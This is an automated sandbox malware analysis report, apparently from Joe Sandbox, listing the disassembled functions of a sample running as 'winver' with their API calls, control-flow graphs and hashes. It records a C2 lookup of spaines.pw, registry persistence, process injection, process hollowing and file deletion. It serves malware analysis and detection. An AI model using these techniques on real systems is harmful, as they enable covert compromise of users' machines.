                                                                                                                                                                                          Function 02F02A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 339 2f02a14-2f02a1a call 2f03653 lstrcat 342 2f02a20-2f02a2b call 2f02b4d 339->342 344 2f02a30-2f02a43 call 2f034f7 342->344 346 2f02a48-2f02a4f 344->346 346->342 347 2f02a51-2f02a6d call 2f0343f call 2f02683 346->347 352 2f02a9a-2f02ab1 call 2f02683 347->352 353 2f02a6f 347->353 358 2f02ab3 352->358 359 2f02ade-2f02af5 call 2f02683 352->359 353->352 354 2f02a71-2f02a86 call 2f026f9 353->354 354->352 363 2f02a88 354->363 358->359 361 2f02ab5-2f02aca call 2f026f9 358->361 368 2f02af7 359->368 369 2f02af8-2f02b11 call 2f02e97 359->369 361->359 370 2f02acc 361->370 363->352 366 2f02a8a-2f02a94 DeleteFileA 363->366 366->352 368->369 374 2f02b13-2f02b1c call 2f03057 369->374 375 2f02b34-2f02b48 Sleep 369->375 370->359 372 2f02ace-2f02ad8 DeleteFileA 370->372 372->359 374->375 378 2f02b1e-2f02b2e DeleteFileA 374->378 375->346 378->375
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02F02A0B), ref: 02F02A1A
                                                                                                                                                                                            • Part of subcall function 02F02B4D: inet_addr.WS2_32(00000000), ref: 02F02BDA
                                                                                                                                                                                            • Part of subcall function 02F02B4D: gethostbyname.WS2_32(00000000), ref: 02F02BEE
                                                                                                                                                                                            • Part of subcall function 02F02B4D: Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 02F02C44
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02A94
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02F02AD8
                                                                                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02F02B2E
                                                                                                                                                                                          • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02F02B42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: DeleteFile$Sleep$gethostbynameinet_addrlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1642945479-0
                                                                                                                                                                                          • Opcode ID: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                                          • Instruction ID: e25cbe60b1bffee5149a55e253bf61ae087e64bb4c684b6d3fcc895a71bfb008
                                                                                                                                                                                          • Opcode Fuzzy Hash: e8b37fd542badaf8432c301c0c7f6f955668a479b2aefd2c0e39df4bfbe44a3d
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE3112719002599EDF226B718DCCBAB76FCEF40789F0405E6AF45EA085DE349680DEB0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F02B4D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138sleepnetworkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 379 2f02b4d-2f02b57 380 2f02b5e-2f02b62 379->380 381 2f02b64-2f02b89 call 2f03673 380->381 382 2f02b8b-2f02b9b 380->382 388 2f02bd0-2f02be2 inet_addr 381->388 383 2f02b9d-2f02ba0 382->383 383->383 385 2f02ba2-2f02ba8 383->385 387 2f02bad-2f02bb6 385->387 389 2f02bb8-2f02bba 387->389 390 2f02bbc-2f02bbe 387->390 391 2f02c03-2f02c3c call 2f03673 388->391 392 2f02be4-2f02bf6 gethostbyname 388->392 389->390 394 2f02bc0-2f02bc1 389->394 390->387 398 2f02c41-2f02c4f Sleep 391->398 392->380 395 2f02bfc-2f02c01 392->395 394->387 397 2f02bc3-2f02bcf 394->397 395->391 397->388 398->398 399 2f02c51-2f02c85 call 2f03673 call 2f02399 call 2f02e97 398->399 405 2f02c8a-2f02ca2 call 2f02c99 call 2f0379f 399->405 405->380 411 2f02ca8-2f02cad 405->411 411->380 412 2f02cb3-2f02cbc 411->412 412->380 413 2f02cc2-2f02cc5 412->413 413->380 414 2f02ccb-2f02cd1 413->414 415 2f02cd3-2f02cd8 414->415 416 2f02cde-2f02cf1 call 2f02cfc 414->416 415->380 415->416 416->380 419 2f02cf7-2f02cf9 416->419
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 02F02BDA
                                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 02F02BEE
                                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 02F02C44
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                                          • Opcode ID: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                                          • Instruction ID: 013f7c341f51ce9822f8864702cb40663b56a831b8d6658f02fefdd60a8aad3e
                                                                                                                                                                                          • Opcode Fuzzy Hash: c9cc6fa465a78be1f47e10917d204f6e8e853b0dcedaa1fd5f228baccd3b115a
                                                                                                                                                                                          • Instruction Fuzzy Hash: C04118B2500104AEEB11AF34C8C8BAA7BE9EF44744F058595EE45EF1C6DB309645EBB0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F02C99 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107sleepnetworkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 420 2f02c99-2f02ca2 call 2f0379f 423 2f02ca8-2f02cad 420->423 424 2f02b5e-2f02b62 420->424 423->424 425 2f02cb3-2f02cbc 423->425 426 2f02b64-2f02b89 call 2f03673 424->426 427 2f02b8b-2f02b9b 424->427 425->424 428 2f02cc2-2f02cc5 425->428 437 2f02bd0-2f02be2 inet_addr 426->437 429 2f02b9d-2f02ba0 427->429 428->424 431 2f02ccb-2f02cd1 428->431 429->429 432 2f02ba2-2f02ba8 429->432 434 2f02cd3-2f02cd8 431->434 435 2f02cde-2f02cf1 call 2f02cfc 431->435 436 2f02bad-2f02bb6 432->436 434->424 434->435 435->424 448 2f02cf7-2f02cf9 435->448 439 2f02bb8-2f02bba 436->439 440 2f02bbc-2f02bbe 436->440 441 2f02c03-2f02c3c call 2f03673 437->441 442 2f02be4-2f02bf6 gethostbyname 437->442 439->440 445 2f02bc0-2f02bc1 439->445 440->436 450 2f02c41-2f02c4f Sleep 441->450 442->424 446 2f02bfc-2f02c01 442->446 445->436 449 2f02bc3-2f02bcf 445->449 446->441 449->437 450->450 451 2f02c51-2f02c95 call 2f03673 call 2f02399 call 2f02e97 call 2f02c99 450->451 451->420
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 02F02BDA
                                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 02F02BEE
                                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 02F02C44
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                                          • Opcode ID: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                                          • Instruction ID: 11ad93942f5f0d145cc99894309973618758721f1849ba4dd87884ac732340ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A31E671500210AEEB12AF20CCC8BAA77E9EF44754F048595EE45EF186EB30D644EBB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F00811 Relevance: 6.1, APIs: 4, Instructions: 111threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02F0086E: RegCreateKeyExA.KERNELBASE(00000000,02F00840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00876
                                                                                                                                                                                            • Part of subcall function 02F0086E: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 02F0089D
                                                                                                                                                                                            • Part of subcall function 02F0086E: RegCloseKey.KERNELBASE(?), ref: 02F008A9
                                                                                                                                                                                          • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00900
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$CloseThreadValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 711899537-0
                                                                                                                                                                                          • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction ID: 6b977f34ed457e15f4c20ef090648430ee2c397755a1f380c93f7ee0a985d850
                                                                                                                                                                                          • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5731C5724002046FEB017B709DC5FAA77ADFF01384F44416AFE85DA0E1DE7449549AB9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F00B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindWindowA.USER32(02F00B57,0000000E), ref: 02F00B6A
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 02F00B77
                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 02F00B84
                                                                                                                                                                                            • Part of subcall function 02F00DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,02F00D88,00000000,0000090B,00000000), ref: 02F00E06
                                                                                                                                                                                            • Part of subcall function 02F00DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 02F00E24
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 02F00BA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3233011861-0
                                                                                                                                                                                          • Opcode ID: 1c0a6b39f04f013888fd52650cb507d7030a6be19416d1a6354875ae22fce905
                                                                                                                                                                                          • Instruction ID: ecb0910fccacfc5ebb33e7eb7b130a615956b6dfdf141d1c8f7b7dd66f099b81
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c0a6b39f04f013888fd52650cb507d7030a6be19416d1a6354875ae22fce905
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0211B2616443416EEF112B709DD4F667F6A6F43784B1980ADEA45DE0E3EE20C806BA38
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F02683 Relevance: 6.0, APIs: 4, Instructions: 41fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 02F0269E
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 02F026B7
                                                                                                                                                                                          • ReadFile.KERNELBASE(02F0298A,?,00000000,?,00000000), ref: 02F026DB
                                                                                                                                                                                          • CloseHandle.KERNEL32(02F0298A), ref: 02F026EC
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3919263394-0
                                                                                                                                                                                          • Opcode ID: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                                          • Instruction ID: d70179389d6bfa9b4f9e6b356810d2dd97c340471ca8a65a2b3f05ab19294815
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E01EC70A41209FFEF119FA0CC89B5D7AB5EF04B44F2041A9AE14F91E0D7709A20AF64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F026F9 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 02F02715
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 02F02732
                                                                                                                                                                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 02F0274E
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 02F0275F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3604237281-0
                                                                                                                                                                                          • Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                                          • Instruction ID: 53c2aef1aa8b8afb0c3de7f99e9f61149e5926a5ad6f8450a541c680ed648f85
                                                                                                                                                                                          • Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3001E830640209BFEF129FA0CC89F8D7EB4BF04B44F1041A9BF14B91E1D770AA21AB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F01345 Relevance: 4.6, APIs: 3, Instructions: 61memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 02F01372
                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 02F01387
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 02F013E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Virtual$Protect$Alloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2541858876-0
                                                                                                                                                                                          • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction ID: 93b1ab5daedebc82a863abebd8440accbbcee7e49ebc2c153ba2ed83f4eca2dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                                          • Instruction Fuzzy Hash: FA21AE31904216AFDF119F78C884B5EBBB6AF04340F054215FE59BB5D4DB30A800CB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F00B6B Relevance: 4.5, APIs: 3, Instructions: 22threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 02F00B77
                                                                                                                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 02F00B84
                                                                                                                                                                                            • Part of subcall function 02F00DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,02F00D88,00000000,0000090B,00000000), ref: 02F00E06
                                                                                                                                                                                            • Part of subcall function 02F00DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 02F00E24
                                                                                                                                                                                          • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 02F00BA6
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$AllocExitMemoryOpenThreadVirtualWindowWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2938372061-0
                                                                                                                                                                                          • Opcode ID: 1059d9524711834fbe5d8e118d96b44bb8c4a827e91fa872819f30df3597f232
                                                                                                                                                                                          • Instruction ID: 887e5636dd4efa8f018f9e5b2dbef78c1ea4e77a88298461d8887e5733e78a43
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1059d9524711834fbe5d8e118d96b44bb8c4a827e91fa872819f30df3597f232
                                                                                                                                                                                          • Instruction Fuzzy Hash: E9E086B4A812412AFB103E618CC9F9A3E185F05799F080168FF85FE0D7DF60C1465634
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F0086E Relevance: 4.5, APIs: 3, Instructions: 18registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyExA.KERNELBASE(00000000,02F00840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00876
                                                                                                                                                                                          • RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 02F0089D
                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?), ref: 02F008A9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseCreateValue
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1818849710-0
                                                                                                                                                                                          • Opcode ID: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                                          • Instruction ID: 30af9a2d2f5a90970354a76d8b3d716f8b80c703c301778db772b9ba412c6ae8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
                                                                                                                                                                                          • Instruction Fuzzy Hash: 80E09A72100004BFEF125F50DC89A997B75EF54745F1440A1FE4AAD075C7B14A60DF68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F008D9 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02F00643: CreateMutexA.KERNELBASE(00000000,00000000), ref: 02F0065A
                                                                                                                                                                                            • Part of subcall function 02F00643: LoadLibraryA.KERNELBASE(02F00673,00000009,?,00000000), ref: 02F00681
                                                                                                                                                                                            • Part of subcall function 02F00643: lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
                                                                                                                                                                                            • Part of subcall function 02F00643: Sleep.KERNELBASE(00001388), ref: 02F006FE
                                                                                                                                                                                            • Part of subcall function 02F00643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
                                                                                                                                                                                            • Part of subcall function 02F00643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
                                                                                                                                                                                            • Part of subcall function 02F00643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
                                                                                                                                                                                            • Part of subcall function 02F00643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
                                                                                                                                                                                            • Part of subcall function 02F00643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
                                                                                                                                                                                          • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00900
                                                                                                                                                                                            • Part of subcall function 02F00CE8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F00D07
                                                                                                                                                                                            • Part of subcall function 02F00CE8: Sleep.KERNELBASE(000003E8), ref: 02F00D1D
                                                                                                                                                                                            • Part of subcall function 02F00CE8: Process32First.KERNEL32(?,00000000), ref: 02F00D3D
                                                                                                                                                                                            • Part of subcall function 02F00CE8: FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 02F00D88
                                                                                                                                                                                            • Part of subcall function 02F00CE8: Process32Next.KERNEL32(?,?), ref: 02F00D9E
                                                                                                                                                                                            • Part of subcall function 02F00CE8: FindCloseChangeNotification.KERNELBASE(?), ref: 02F00DCA
                                                                                                                                                                                            • Part of subcall function 02F00CE8: Sleep.KERNELBASE(000003E8), ref: 02F00DD5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$DirectorySleep$AttributesChangeCloseFileFindNotificationProcess32$FirstLibraryLoadMutexNextSnapshotThreadToolhelp32lstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4243289212-0
                                                                                                                                                                                          • Opcode ID: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                                          • Instruction ID: 726dd8fdf586a0218687ef0333ab55de95550cc0fbe46f3b0b9a40072d7873fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66D05EA18141607DFB003FB08DD4B3B318EDF10380300853DBE85D91D5DD304A44AD76
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 02F02DCF Relevance: 12.1, APIs: 8, Instructions: 52encryptionCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,02F02DA0,0000002F,?,00000000,00000001,F0000000), ref: 02F02DE0
                                                                                                                                                                                          • CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 02F02E06
                                                                                                                                                                                          • CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 02F02E29
                                                                                                                                                                                          • CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 02F02E43
                                                                                                                                                                                          • CryptVerifySignatureA.ADVAPI32(?,02F02A30,02F02A2C,?,00000000,00000000), ref: 02F02E63
                                                                                                                                                                                          • CryptDestroyHash.ADVAPI32(?), ref: 02F02E71
                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 02F02E7D
                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F02E8B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 295346115-0
                                                                                                                                                                                          • Opcode ID: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                                          • Instruction ID: d4d837671d06ee331a39c9e97226c1564ee5ea46e6c1a4b8e2faa1060939f024
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0111C31640115BBEF221F20CC89BD97B75AF54B44F1441D4BE8ABD0A4DBB189A0DF68
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 02F0093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • Sleep.KERNEL32(00001388), ref: 02F00959
                                                                                                                                                                                          • RtlExitUserThread.NTDLL(00000000), ref: 02F00961
                                                                                                                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02F00981
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 02F00999
                                                                                                                                                                                            • Part of subcall function 02F009D9: CreateProcessA.KERNEL32(00000000,02F009D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02F009E0
                                                                                                                                                                                            • Part of subcall function 02F009D9: GetThreadContext.KERNEL32(?,00000000), ref: 02F00A08
                                                                                                                                                                                            • Part of subcall function 02F009D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02F00A33
                                                                                                                                                                                            • Part of subcall function 02F009D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,02F05810,00000000,00000000,00000002), ref: 02F00A78
